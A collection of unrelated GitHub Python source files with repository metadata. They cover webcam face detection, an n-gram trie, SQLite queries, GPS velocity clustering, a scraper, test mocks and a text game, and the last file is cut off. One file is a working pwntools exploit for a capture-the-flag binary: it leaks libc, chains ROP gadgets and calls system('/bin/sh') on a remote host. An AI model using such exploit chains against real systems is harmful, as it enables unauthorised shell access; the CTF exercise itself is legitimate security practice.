e53c3a5efd5933169faf0801fc2230578f73e5e4 | Python | leejh96/face_recognition | /웹캠에서얼굴인식.py | UTF-8 | 1,991 | 2.8125 | 3 | [] | no_license | import cv2
import numpy as np
font = cv2.FONT_ITALIC
def faceDetect():
eye_detect = True
faceCascade = cv2.CascadeClassifier(r"D:/OpenCV/FaceDetect-master/haarcascade_frontalface_default.xml") # 얼굴 찾기 파일
eyeCascade = cv2.CascadeClassifier(r"D:/OpenCV/FaceDetect-master/haarcascade_eye.xml") # 눈 찾기 파일
try:
cap = cv2.VideoCapture(0) # 0번 웹캠, 1번 USB 카메라
except:
print("camera loading error")
return
while True:
retval, frame = cap.read()
frame = cv2.flip(frame, 1) # 거울모드
if not retval:
break
if eye_detect:
info = "Eye Detention ON"
else:
info = "Eye Detention OFF"
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = np.zeros(4)
faces = faceCascade.detectMultiScale(gray, 1.3, 5)
cv2.putText(frame, info, (5, 15), font, 0.5, (255, 0, 255), 1) # 카메라 영상위에 셋팅된 info 출력
eyes = np.zeros((2, 4))
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2) # 사각형 범위
if eye_detect:
# 검출된 눈 영역의 컬러와 그레이스케일 관심 영역을 roi_color와 roi_gray에 저장
roi_gray = gray[y:y + h, x:x + w]
roi_color = frame[y:y + h, x:x + w]
eyes = eyeCascade.detectMultiScale(roi_gray) # roi_gray에서 디폴트 (1.3, 5)로 눈 영역 검출
for (ex, ey, ew, eh) in eyes:
cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)
cv2.imshow("frame", frame)
cv2.waitKey(30)#바로 꺼지려면 지워야함
if np.all(faces != 0) and np.all(eyes != 0):
cv2.imwrite('data.jpg', frame)
break
cap.release()
cv2.destroyAllWindows()
faceDetect()
| true |
22340a8f82c4b493c6130bee3399042c42d38121 | Python | chrishefele/kaggle-sample-code | /WordImputation/src/old/trie_NGramIndex.py | UTF-8 | 2,012 | 3.1875 | 3 | [] | no_license | import sys
import marisa_trie # memory-efficient implementation of trie data structure
import time
data_format = "<i"
WORD_SEP = "`"
class NGramIndex:
def __init__(self, ngram_file, **kwargs):
self.build_index(ngram_file, **kwargs)
def build_index(self, ngram_file, **kwargs):
data = self.data_generator(ngram_file, **kwargs)
self.trie = marisa_trie.RecordTrie(data_format, data)
def data_generator(self, ngram_file, max_lines=0, min_count=0):
fin = open(ngram_file,'r')
for n_lines, line in enumerate(fin):
tokens = line.rstrip().split()
count = int(tokens[0])
if max_lines and n_lines > max_lines:
break
if count < min_count:
break
words = WORD_SEP.join(tokens[1:])
words_start = words
words = words.decode("utf-8")
if words_start != words.encode("utf-8"):
print n_lines, "reencoded NOT EQUAL"
# print n_lines, words, type(words)
if n_lines % 100000 == 0:
print "\r", float(n_lines)/1000000,"million",
sys.stdout.flush()
yield (words, (count,))
fin.close()
# pass in a list of words, make a string, search trie, return a list of next words
def match_keys(self, s):
return self.trie.keys(s)
# pass in a list of words, make a string, search trie, return list of next words & counts
def match_items(self, s):
return self.trie.items(s)
if __name__ == '__main__':
#trigrams = NGramIndex('../data/3_grams.txt', max_lines=1000000)
trigrams = NGramIndex('../data/3_grams.txt', min_count = 20)
print trigrams.match_keys( u"he`said`")
print trigrams.match_keys( u"humbugerooski`said`")
print trigrams.match_items(u"he`said`")
t0 = time.time()
for i in range(10000):
result = trigrams.match_items(u"he`said`")
print time.time() - t0, "sec per 10000"
| true |
3cd32f641c74b365be271f7ae854ed4eab09e590 | Python | ben-dent/Contract-Cheating-Analysis | /getMostFrequentBidders.py | UTF-8 | 784 | 2.78125 | 3 | [
"MIT"
] | permissive | import sqlite3 as lite
con = lite.connect('JobDetails.db')
cur = con.cursor()
bids = {}
cur.execute('SELECT DISTINCT(User) FROM Bids')
bidders = [each[0] for each in cur.fetchall()]
for i in range(len(bidders)):
bidder = bidders[i]
print("Bidder " + str(i + 1) + "/" + str(len(bidders)))
cur.execute("SELECT COUNT(BidID) FROM Bids WHERE User = '" + bidder + "'")
bids.update({bidder: cur.fetchone()[0]})
# bids.update({cur.fetchone()[0]: bidder})
print("\n######################\n")
sortedList = sorted(list(bids.values()))
bidNumbers = sortedList[-5:]
for bidder in bidders:
val = bids.get(bidder)
if val in bidNumbers:
print(bidder + ": " + str(val))
# topBidders = [[bids.get(number), number] for number in sorted(list(bids.keys()))[-5:]] | true |
41be280c253f41a4abb19d86924716b9315e0880 | Python | priyankninama/Python_Programmes- | /Match Substring using regular expression.py | UTF-8 | 331 | 3.484375 | 3 | [] | no_license | import re
def text_match(text):
patterns = '^[a-zA-Z0-9_]*$'
if re.search(patterns, text):
return ('Found a match \n')
else:
return('Not matched any number and underscore in string \n')
print(text_match("Gec gandhinagar."))
print(text_match("Python_practical_24")) | true |
9cba9e949c77f41b842980d72b2d976667d44ad0 | Python | EmbraceLife/LIE | /my_utils/plot_math_functions.py | UTF-8 | 1,962 | 3.21875 | 3 | [] | no_license | """
plot_math_functions
"""
import matplotlib.pyplot as plt
import numpy as np
import keras.backend as K
# a function between two variables (y_true, y_pred)
def f(y_true,y_pred):
return np.exp(-y_true)*np.sin(y_pred-y_true)
y_true = np.linspace(0,5,3001)
y_pred = np.arange(0,40000,4000)
for tval in y_pred:
plt.plot(y_true, f(y_true, tval))
plt.show()
"""
logloss function
1. loss can be overly rewarded or punished, see through viz of loss func
2. if certain range of predictions can overly reward or punish loss, we need to clip predictions
"""
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import log_loss
x = [i*.0001 for i in range(1,10000)]
# y_true : array-like or label indicator matrix, Ground truth (correct) labels for n_samples samples
y_true1 = np.ones(9999).reshape(-1,1) # all 1s: when all targets are buy
y_true2 = np.zeros(9999).reshape(-1,1)
y_true3 = np.zeros(9999).reshape(-1,1)
y_true = np.concatenate((y_true1, y_true2, y_true3), axis=1)
y_pred1 = np.array([[i*.0001] for i in range(1,10000)]) # gradually becomes buy features
y_pred2 = np.zeros((9999,1))
y_pred3 = np.zeros((9999,1))
y_pred = np.concatenate((y_pred1, y_pred2, y_pred3), axis=1)
ll1 = []
ll2 = []
ll = []
for i in range(9999):
# ll1.append(log_loss(y_true[i],y_pred1[i],eps=1e-15, labels=[1.0, 0.0]))
# ll2.append(log_loss(y_true[i],y_pred2[i],eps=1e-15, labels=[1.0, 0.0]))
ll.append(log_loss(y_true[i],y_pred[i],eps=1e-15, labels=[1.0, 0.0]))
plt.plot(x, ll, c='blue', label="pred_decrease")
# plt.axis([-.05, 1.1, -.8, 10])
plt.title("How loss move when preds[buy] move from 0.0 to 1.0")
plt.xlabel("preds[buy] grow from 0.0 to 1.0")
plt.ylabel("loss")
plt.legend(loc="best")
plt.show()
#
# import matplotlib.pyplot as plt
# import numpy as np
# import keras.backend as K
#
# y_pred = np.random.random(100)
# y_true = np.linspace(0,5,3001)
#
# classes = K.categorical_crossentropy(y_pred, y_true)
# print(classes)
| true |
6288c6a6508a182d0cefd0222f92b2c48d0a93ba | Python | amyd99/tvshow-crawler | /get-tv-shows.py | UTF-8 | 1,578 | 2.796875 | 3 | [
"Apache-2.0"
] | permissive | import sys
import http.client
from pathlib import Path
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.found = False
self.tv_list = []
def handle_starttag(self, tag, attrs):
if tag != "input":
return
for attr in attrs:
if len(attr) != 2:
continue
if attr[0] == "class" and attr[1] == "down_url":
self.found = True
if attr[0] == "value":
url = attr[1]
if attr[0] == "file_name":
name = attr[1]
if self.found:
self.found = False
self.tv_list.append({"url": url, "name": name})
def output_rss(self, flist):
for tv in self.tv_list:
if tv["name"] not in flist:
print(tv["url"])
def parse(tv, conn):
#print("parse", url, file=sys.stderr)
print("")
print(tv["folder"].replace("/", "\\"))
conn.request("GET", tv["url"])
r = conn.getresponse()
if r.status == 200:
parser = MyHTMLParser()
parser.feed(str(r.read(), "gbk"))
flist = [ p.name for p in Path("D:/Media/TV Shows/" + tv["folder"]).iterdir() ]
parser.output_rss(flist)
tv_dict = [
{"url": "/content/meiju22476.html", "folder": "The Walking Dead/Season 07"},
{"url": "/content/meiju22422.html", "folder": "Criminal Minds/Season 12"}
]
conn = http.client.HTTPConnection("www.meijutt.com")
for tv in tv_dict:
parse(tv, conn)
| true |
53ec3c80ee1d0ed9007360f38dd34fc50dd0e494 | Python | BlueWolf2137/bootcamp | /1/6.py | UTF-8 | 185 | 3.9375 | 4 | [] | no_license | a = float(input("Podaj liczbę: "))
b = (a>10)
c = (a<=15)
d = ((a%2)==0)
print(f"Większa od 10: {a>10}")
print(f"Mniejsza równa 15: {a<=15}")
print(f"Podzielna przez 2: {(a%2)==0}") | true |
67a71f298901a771e96e1e28e8495e05d6b84bfc | Python | Contrast-Labs/detect-secrets | /testing/mocks.py | UTF-8 | 2,618 | 2.828125 | 3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | """This is a collection of utility functions for easier, DRY testing."""
import io
from collections import defaultdict
from contextlib import contextmanager
from types import ModuleType
from typing import Any
from typing import Dict
from typing import Generator
from typing import IO
from typing import Iterator
from typing import Optional
from unittest import mock
def mock_file_object(string: str) -> IO:
return io.StringIO(string)
class PrinterShim:
def __init__(self) -> None:
self.clear()
def add(self, message: str, *args: Any, **kwargs: Any) -> None:
self.message += str(message) + '\n'
def clear(self) -> None:
self.message = ''
@contextmanager
def mock_printer(
module: ModuleType,
shim: Optional[PrinterShim] = None,
) -> Generator[PrinterShim, None, None]:
if not shim:
shim = PrinterShim()
with mock.patch.object(module, 'print', shim.add):
yield shim
class MockLogWrapper:
"""This is used to check what is being logged."""
def __init__(self) -> None:
self.messages: Dict[str, str] = defaultdict(str)
def error(self, message: str, *args: Any) -> None:
self.messages['error'] += (str(message) + '\n') % args
@property
def error_messages(self) -> str: # pragma: no cover
return self.messages['error']
def warning(self, message: str, *args: Any) -> None:
self.messages['warning'] += (str(message) + '\n') % args
@property
def warning_messages(self) -> str: # pragma: no cover
return self.messages['warning']
def info(self, message: str, *args: Any) -> None:
self.messages['info'] += (str(message) + '\n') % args
@property
def info_messages(self) -> str: # pragma: no cover
return self.messages['info']
def debug(self, message: str, *args: Any) -> None:
self.messages['debug'] += (str(message) + '\n') % args
@property
def debug_messages(self) -> str: # pragma: no cover
return self.messages['debug']
@contextmanager
def disable_gibberish_filter() -> Iterator[None]:
"""
Unfortunately, we can't just use `Settings.disable_filters`, since `parse_args` is
the function that *enables* this filter. Therefore, for test cases that test through
the `main` function flow, we can't disable the filter before the function call.
However, since this only happens in test environments, we can just mock it out.
"""
with mock.patch(
'detect_secrets.filters.gibberish.is_feature_enabled',
return_value=False,
):
yield
| true |
0de535f9a72eb1db610b9fb478f8d743e83a68d6 | Python | pawel-baster/enc-backup | /encbackup/helpers/logging.py | UTF-8 | 414 | 2.671875 | 3 | [] | no_license | '''
Created on 2012-04-01
@author: pawel
'''
import datetime
class Logger(object):
printDebug = True
@staticmethod
def _printLine(msg):
print datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S :'), msg
@staticmethod
def log(msg):
Logger._printLine(msg)
@staticmethod
def debug(msg):
if Logger.printDebug:
Logger._printLine(msg)
| true |
75b6db5526db293f3d5fbaa3998306fdfa66fe37 | Python | pravali96/Natural-Language-Processing | /Spam Classifier Models/SpamClassifierModel.py | UTF-8 | 1,733 | 2.984375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 22 13:23:24 2021
@author: prava
"""
import pandas as pd
messages=pd.read_csv('C:/Users/prava/Downloads/SMSSpamCollection.csv',
sep='\t', names=["label","message"])
messages.head()
import re
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
ps=PorterStemmer()
corpus=[]
# Preprocessing the texts
for i in range(0, len(messages)):
review = re.sub('[^a-zA-Z]', ' ', messages['message'][i])
review = review.lower()
review = review.split()
review = [ps.stem(word) for word in review if not word in stopwords.words('english')]
review = ' '.join(review)
corpus.append(review)
corpus
# Creating bag of words using CountVectorizer
from sklearn.feature_extraction.text import CountVectorizer
cv=CountVectorizer(max_features=2500) # There are 6296 unique words, selected 2500 words
X=cv.fit_transform(corpus).toarray()
y=pd.get_dummies(messages['label'])
y=y.iloc[:,1].values
y
# Train Test Split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
# Training model using Naive bayes classifier
from sklearn.naive_bayes import MultinomialNB
spam_detect_model = MultinomialNB().fit(X_train, y_train)
y_pred=spam_detect_model.predict(X_test)
# Import library to check accuracy
from sklearn.metrics import classification_report,confusion_matrix,accuracy_score
matrix=confusion_matrix(y_test,y_pred)
print(matrix)
score=accuracy_score(y_test,y_pred)
print(score)
report=classification_report(y_test,y_pred)
print(report)
| true |
6db918db62fbe77b71e3044930646f689495679b | Python | GeoGateway/GNSS_clustering | /clusterVelocity.py | UTF-8 | 11,509 | 3.0625 | 3 | [] | no_license | #!/usr/bin/env python3
# Author: Developed for GeoGateway by Robert Granat and Michael Heflin
# Date: Aug 7, 2019
# Organization: JPL, California Institute of Techology
prolog="""
**PROGRAM**
clusterVelocities.py
**PURPOSE**
Calculate cluster membership of GPS stations based on velocities obtained from the routine getVelocities.py. Return labeled kml and text table files.
See http://scikit-learn.org/stable/modules/clustering.html for information on individual clustering methods.
**USAGE**
"""
epilog="""
**EXAMPLE**
clusterVelocity.py -input velocity_table.txt -output labeled_velocity.kml -feature_name "Lat" "Lon" "Delta E" "Delta N" "Delta V" -k 10 --scale -method k-means
**COPYRIGHT**
| Copyright 2018, by the California Institute of Technology
| United States Government Sponsorship acknowledged
| All rights reserved
**AUTHORS**
| Developed for GeoGateway by Robert Granat and Michael Heflin
| Jet Propulsion Laboratory
| California Institute of Technology
| Pasadena, CA, USA
"""
# Import python modules
import numpy as np
import matplotlib
import matplotlib.cm as cm
import random
import argparse
import math
import pandas as pd
from sklearn.cluster import KMeans
from sklearn.cluster import AffinityPropagation
from sklearn.cluster import MeanShift
from sklearn.cluster import SpectralClustering
from sklearn.cluster import AgglomerativeClustering
from sklearn.cluster import DBSCAN
from sklearn.mixture import GaussianMixture
from sklearn.mixture import BayesianGaussianMixture
from sklearn import preprocessing
def runCmd(cmd):
'''run a command'''
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,executable='/bin/bash')
(out, err) = p.communicate()
if p.returncode != 0:
raise UserWarning('failed to run {}\n{}\n'.format(cmd.split()[0],
err))
return out
def _getParser():
parser = argparse.ArgumentParser(description=prolog,epilog=epilog,formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-input', type=str, required=True,
help='name of the input velocity file')
parser.add_argument('-output', type=str, required=True,
help='name of the labeled output velocity kml file')
parser.add_argument('-k', type=int, required=False,
help='number of clusters; required for k-means, spectral, agglomerative, gmm, and bgmm; for bgmm represents only an *upper bound* on the number of clusters')
parser.add_argument('-feature_name', metavar='NAME', type=str, nargs='+', required=True,
help='names of features to use in clustering; must be some subset of {"Lon", "Lat", "Delta E", "Delta N", "Delta V", "Sigma E", "Sigma N", "Sigma V"}')
parser.add_argument('-method', type=str, required=False, default='k-means',
help='clustering method; must be one of {k-means, affinity, meanshift, spectral, agglomerative, bdscan, gmm, bgmm} (default: use k-means)')
parser.add_argument('--scale', action='store_true', default=False, required=False,
help='scale features to have zero mean and unit variance (default: no scaling)')
return parser
def main():
# Read command line arguments
parser = _getParser()
args = parser.parse_args()
# Read the velocity file and extract features
# Assumes Mike Helfin's formatting in getVelocities.py
df = pd.read_csv(args.input, skiprows=1, names=['Site', 'Lon', 'Lat', 'Delta E', 'Delta N', 'Delta V', 'Sigma E', 'Sigma N', 'Sigma V'], delim_whitespace=True)
Z = df[args.feature_name]
# Optional: scale features to have zero mean and unit covariance
if args.scale:
Z = preprocessing.scale(Z)
# Perform the clustering
if args.method == 'k-means':
k = args.k
kmeans = KMeans(n_clusters = k, init='k-means++', max_iter = 1000, n_init = 10, random_state=1).fit(Z)
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
elif args.method == 'affinity':
af = AffinityPropagation().fit(Z)
cluster_centers_indices = af.cluster_centers_indices_
labels = af.labels_
k = len(cluster_centers_indices)
elif args.method == 'meanshift':
ms = MeanShift().fit(Z)
labels = ms.labels_
cluster_centers = ms.cluster_centers_
labels_unique = np.unique(labels)
k = len(labels_unique)
elif args.method == 'spectral':
k = args.k
sc = SpectralClustering(n_clusters = k).fit(Z)
labels = sc.labels_
elif args.method == 'agglomerative':
k = args.k
ac = AgglomerativeClustering(n_clusters = k).fit(Z)
labels = ac.labels_
elif args.method == 'dbscan':
db = DBSCAN().fit(Z)
labels = db.labels_
labels_unique = np.unique(labels)
k = len(labels_unique)
elif args.method == 'gmm':
k = args.k
gm = GaussianMixture(n_components = k, n_init = 10).fit(Z)
labels = gm.predict(Z)
elif args.method == 'bgmm':
k = args.k
bgm = BayesianGaussianMixture(n_components = k, n_init = 10).fit(Z)
labels = bgm.predict(Z)
labels_unique = np.unique(labels)
k = len(labels_unique)
else:
raise ValueError('Invalid clustering method specified')
# Rotate labels vector into a column
labels = np.reshape(labels,(-1,1))
# Add the labels to the dataframe and then write the results
df = df.assign(Label=labels)
# Write outputs; this is a modified version of Mike Heflin's output format
# Setup color map for markers
norm = matplotlib.colors.Normalize(vmin=0, vmax=k, clip=False)
mapper = cm.ScalarMappable(norm=norm, cmap=cm.hsv)
# Start kml file
outFile = open(args.output.partition('.')[0]+'.kml','w')
print("<?xml version=\"1.0\" encoding=\"UTF-8\"?>",file=outFile)
print("<kml xmlns=\"http://www.opengis.net/kml/2.2\">",file=outFile)
print(" <Folder>",file=outFile)
# Start kml file without vector markers
outFileNoVec = open(args.output.partition('.')[0]+'_novector.kml','w')
print("<?xml version=\"1.0\" encoding=\"UTF-8\"?>",file=outFileNoVec)
print("<kml xmlns=\"http://www.opengis.net/kml/2.2\">",file=outFileNoVec)
print(" <Folder>",file=outFileNoVec)
# Start txt file
txtFile = open(args.output.partition('.')[0]+'.txt','w')
print("Site Lon Lat Delta E Delta N Delta V Sigma E Sigma N Sigma V Label",file=txtFile)
# Add markers and vectors
for i in range(0,df.shape[0]):
lon = df.iat[i,1]
lat = df.iat[i,2]
vlon = df.iat[i,3]
vlat = df.iat[i,4]
vrad = df.iat[i,5]
slon = df.iat[i,6]
slat = df.iat[i,7]
srad = df.iat[i,8]
label = df.iat[i,9]
# Set marker color
rgba_color = mapper.to_rgba(label, bytes=True)
markercolor = "#ff{:02x}{:02x}{:02x}".format(rgba_color[0],rgba_color[1],rgba_color[2])
# Set scale, assuming default from getVelocities
scale = 320
# Draw markers for kml output
print(" <Placemark>",file=outFile)
print(" <description><![CDATA[",file=outFile)
print(" <a href=\"http://sideshow.jpl.nasa.gov/post/links/{:s}.html\">".format(df.iat[i,0]),file=outFile)
print(" <img src=\"http://sideshow.jpl.nasa.gov/post/plots/{:s}.jpg\" width=\"300\" height=\"300\">".format(df.iat[i,0]),file=outFile)
print(" </a>",file=outFile)
print(" ]]></description>",file=outFile)
print(" <Style><IconStyle>",file=outFile)
print(" <color>{:s}</color>".format(markercolor),file=outFile)
print(" <scale>0.50</scale>",file=outFile)
print(" <Icon><href>http://maps.google.com/mapfiles/kml/paddle/wht-blank.png</href></Icon>",file=outFile)
print(" </IconStyle></Style>",file=outFile)
print(" <Point>",file=outFile)
print(" <coordinates>",file=outFile)
print(" {:f},{:f},0".format(lon,lat),file=outFile)
print(" </coordinates>",file=outFile)
print(" </Point>",file=outFile)
print(" </Placemark>",file=outFile)
# Draw markers for kml output w/o vectors
print(" <Placemark>",file=outFileNoVec)
print(" <description><![CDATA[",file=outFileNoVec)
print(" <a href=\"http://sideshow.jpl.nasa.gov/post/links/{:s}.html\">".format(df.iat[i,0]),file=outFileNoVec)
print(" <img src=\"http://sideshow.jpl.nasa.gov/post/plots/{:s}.jpg\" width=\"300\" height=\"300\">".format(df.iat[i,0]),file=outFileNoVec)
print(" </a>",file=outFileNoVec)
print(" ]]></description>",file=outFileNoVec)
print(" <Style><IconStyle>",file=outFileNoVec)
print(" <color>{:s}</color>".format(markercolor),file=outFileNoVec)
print(" <scale>0.50</scale>",file=outFileNoVec)
print(" <Icon><href>http://maps.google.com/mapfiles/kml/paddle/wht-blank.png</href></Icon>",file=outFileNoVec)
print(" </IconStyle></Style>",file=outFileNoVec)
print(" <Point>",file=outFileNoVec)
print(" <coordinates>",file=outFileNoVec)
print(" {:f},{:f},0".format(lon,lat),file=outFileNoVec)
print(" </coordinates>",file=outFileNoVec)
print(" </Point>",file=outFileNoVec)
print(" </Placemark>",file=outFileNoVec)
# Draw vectors
print(" <Placemark>",file=outFile)
print(" <Style><LineStyle>",file=outFile)
print(" <color>{:s}</color>".format(markercolor),file=outFile)
print(" <width>2</width>",file=outFile)
print(" </LineStyle></Style>",file=outFile)
print(" <LineString>",file=outFile)
print(" <coordinates>",file=outFile)
print(" {:f},{:f},0".format(lon,lat),file=outFile)
print(" {:f},{:f},0".format(lon+vlon/scale,lat+vlat/scale),file=outFile)
print(" </coordinates>",file=outFile)
print(" </LineString>",file=outFile)
print(" </Placemark>",file=outFile)
# Draw sigmas
print(" <Placemark>",file=outFile)
print(" <Style>",file=outFile)
print(" <LineStyle>",file=outFile)
print(" <color>{:s}</color>".format(markercolor),file=outFile)
print(" <width>2</width>",file=outFile)
print(" </LineStyle>",file=outFile)
print(" <PolyStyle>",file=outFile)
print(" <color>{:s}</color>".format(markercolor),file=outFile)
print(" <fill>0</fill>",file=outFile)
print(" </PolyStyle>",file=outFile)
print(" </Style>",file=outFile)
print(" <Polygon>",file=outFile)
print(" <outerBoundaryIs>",file=outFile)
print(" <LinearRing>",file=outFile)
print(" <coordinates>",file=outFile)
theta = 0
for k in range(0,16):
angle = k/15*2*math.pi
elon = slon*math.cos(angle)*math.cos(theta)-slat*math.sin(angle)*math.sin(theta)
elat = slon*math.cos(angle)*math.sin(theta)+slat*math.sin(angle)*math.cos(theta)
elon = (elon+vlon)/scale
elat = (elat+vlat)/scale
print(" {:f},{:f},0".format(lon+elon,lat+elat),file=outFile)
print(" </coordinates>",file=outFile)
print(" </LinearRing>",file=outFile)
print(" </outerBoundaryIs>",file=outFile)
print(" </Polygon>",file=outFile)
print(" </Placemark>",file=outFile)
# Make table
print("{:s} {:12f} {:12f} {:12f} {:12f} {:12f} {:12f} {:12f} {:12f} {:12d}".format(df.iat[i,0],lon,lat,vlon,vlat,vrad,slon,slat,srad,label),file=txtFile)
# Finish kml file
print(" </Folder>",file=outFile)
print("</kml>",file=outFile)
outFile.close()
txtFile.close()
# Finish kml file w/o vectors
print(" </Folder>",file=outFileNoVec)
print("</kml>",file=outFileNoVec)
outFile.close()
txtFile.close()
if __name__ == '__main__':
main()
| true |
04ef24e6b896b641acdee30f575a8e8b0a9921fd | Python | Manguinhos-HacktoberFest-2019/rpg | /src/phases/escolhas.py | UTF-8 | 2,278 | 3.890625 | 4 | [] | no_license | #Autor: Joao Pedro Garcia Pereira
def escolhas():
def validador(resposta):
while resposta!=1 and resposta !=2:
print("Esta não é uma resposta válida, tente novamente")
resposta=int(input("Oque você deseja? (1 ou 2): "))
return resposta
gameover=4
restart=1
while restart==1 and gameover>0:
restart=0
gameover=gameover-1
print("Após uma longa jornada de aventura... \n")
print("você (como um bom aventureiro programador), resolve ir tomar um café")
print("Enquanto caminhava você observa pessoas mascaradas saindo da cafeteria...\n")
print("É UM ASSALTO!!!\n")
print("Essa não, os assaltantes mascarados roubaram todos os sacos de café! Oque deseja fazer? (1 ou 2)\n\n\n")
print("Correr atrás dos assaltantes (Alguem que rouba café não pode sair impune) (1) Ir em uma outra cafeteria (2)\n")
resposta=int(input())
resposta=validador(resposta)
if resposta==2:
print("Aparentemente aquela não era a única cafeteria que foi roubada, todas estão sem café")
print("Você ficou sem café e todo mundo sabe que não é possível programar sem café\n\n\n")
print("GAME OVER\n\n")
restart=int(input("Digite 1 para tentar novamente! %d tentativas restantes: "%gameover))
else:
print("Por algum motivo o seu instinto de amante de café, faz você correr atrás dos mascarados")
print("Enquanto corria você vê um menino com uma bicicleta. O que deseja fazer? (1 ou 2)\n\n\n")
print("Roubar a bicicleta (afinal tudo por CAFÉ) (1) Continuar correndo (2)" )
resposta=int(input())
resposta=validador(resposta)
if resposta==1:
print("Você rouba a bicicleta e consegue atropelar um dos assaltantes")
print("Porém aquele menino era filho de um policial, que conseguiu chegar até você\n")
print("VOCÊ ESTÁ PRESO!!!")
print("...\n")
print("........\n")
print("............................................\n")
print("Você está preso mas tem seu precioso cafe, então considere uma vitória!!")
else:
print("Você continua correndo até que um dos assaltantes acaba deixando cair um saco")
print("Você leva de volta para a cafeteria, todos te chamam de herói e ganham uma rodada grátis de café!!\n\n")
print("BIG WIN!")
if gameover<0:
return False
else:
return True
| true |
f30956d9347d6a0390de7fd0ce6ff2f5166d2e84 | Python | recursecenter/recurse-lisp-workshop | /lisp/src/nodes/program.py | UTF-8 | 322 | 3.140625 | 3 | [] | no_license | class Program(object):
def __init__(self, expressions):
self.expressions = expressions
def __repr__(self):
return '\n'.join([x.__repr__() for x in self.expressions])
def evaluate(self, scope):
results = [expr.evaluate(scope) for expr in self.expressions]
return results.pop()
| true |
c92ee149b0ac5781a84718b80b207e665c33788e | Python | PIG-007/CTF | /PWN/0x05-Leak_libc/LCTF 2016-pwn100_without_libc/pwn100_without_libc.py | UTF-8 | 2,927 | 2.625 | 3 | [] | no_license | #!/usr/bin/python
#coding:utf-8
from pwn import *
io = remote("172.17.0.3", 10001)
elf = ELF("./pwn100")
puts_addr = elf.plt['puts']
read_got = elf.got['read']
start_addr = 0x400550
pop_rdi = 0x400763
pop6_addr = 0x40075a #万能gadget1:pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; retn
mov_call_addr = 0x400740 #万能gadget2:mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12+rbx*8]
binsh_addr = 0x60107c #bss放了STDIN和STDOUT的FILE结构体,修改会导致程序崩溃,所以找了个固定的可写地址
def leak(addr):
count = 0
up = ''
content = ''
payload = 'A'*72 #padding
payload += p64(pop_rdi) #给puts()赋值
payload += p64(addr) #leak函数的参数addr
payload += p64(puts_addr) #调用puts()函数
payload += p64(start_addr) #跳转到start,恢复栈
payload = payload.ljust(200, 'B') #padding
io.send(payload)
io.recvuntil("bye~\n")
while True: #无限循环读取,防止recv()读取输出不全
c = io.recv(numb=1, timeout=0.1) #每次读取一个字节,设置超时时间确保没有遗漏
count += 1
if up == '\n' and c == "": #上一个字符是回车且读不到其他字符,说明读完了
content = content[:-1]+'\x00' #最后一个字符置为\x00
break
else:
content += c #拼接输出
up = c #保存最后一个字符
content = content[:4] #截取输出的一段作为返回值,提供给DynELF处理
log.info("%#x => %s" % (addr, (content or '').encode('hex')))
return content
d = DynELF(leak, elf = elf)
system_addr = d.lookup('system', 'libc')
log.info("system_addr = %#x", system_addr)
payload = "A"*72 #padding
payload += p64(pop6_addr) #万能gadget1
payload += p64(0) #rbx = 0
payload += p64(1) #rbp = 1,过掉后面万能gadget2的call返回后的判断
payload += p64(read_got) #r12 = got表中read函数项,里面是read函数的真正地址,直接通过万能gadget2的call qword ptr [r12+rbx*8]调用
payload += p64(8) #r13 = 8,read函数读取的字节数,万能gadget2赋值给rdx
payload += p64(binsh_addr) #r14 = read函数读取/bin/sh保存的地址,万能gadget2赋值给rsi
payload += p64(0) #r15 = 0,read函数的参数fd,即STDIN,万能gadget2赋值给edi
payload += p64(mov_call_addr) #万能gadget2
payload += '\x00'*56 #万能gadget2后接判断语句,过掉之后是万能gadget1,用于填充栈
payload += p64(start_addr) #跳转到start,恢复栈
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.recvuntil('bye~\n')
io.send("/bin/sh\x00") #上面的一段payload调用了read函数读取"/bin/sh\x00",这里发送字符串
payload = "A"*72 #padding
payload += p64(pop_rdi) #给system函数传参
payload += p64(binsh_addr) #rdi = &("/bin/sh\x00")
payload += p64(system_addr) #调用system函数执行system("/bin/sh")
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.interactive() | true |
d9c11009af9f8f9b53a04fb67fe358e7e4ec1c5a | Python | marielribes2/python_samples | /test.py | UTF-8 | 143 | 2.640625 | 3 | [
"MIT"
] | permissive |
def printhellofivetimes():
for i in range (5):
print("hello")
printhellofivetimes()
printhellofivetimes()
printhellofivetimes() | true |
1ace316cef46ebd59649586bc4e8ae4ca080a4d3 | Python | github/codeql | /python/ql/test/experimental/library-tests/CallGraph/code/runtime_decision_defns.py | UTF-8 | 131 | 2.6875 | 3 | [
"MIT",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"GPL-1.0-or-later",
"LicenseRef-scancode-free-unknown",
"Python-2.0"
] | permissive | import random
if random.random() < 0.5:
def func4():
print("func4 A")
else:
def func4():
print("func4 B")
| true |
622ef4236a8ce4af3941e875cfe8076ef5ee673e | Python | jianyu-m/comp9102-assignment3 | /cluster.py | UTF-8 | 3,749 | 2.859375 | 3 | [] | no_license | import numpy
from sklearn.cluster import KMeans as kmeans
import math
N = 18576
alpha = .1
def log_e(d, e):
if d == 0:
return 0
else:
return - d / e * math.log(d / e)
def log_ce(wc, w, c, n):
if N == 0:
return 0
else:
return wc / n * math.log2(n * wc / (w * c))
if __name__ == "__main__":
arr = numpy.zeros((N, N))
with open("Graph.txt") as f:
line = " "
while len(line) > 0:
line = f.readline()
if len(line) <= 0:
break
linarr = line.split(" ")
fr, to = int(linarr[0]), int(linarr[1])
arr[fr - 1][to - 1] = 1
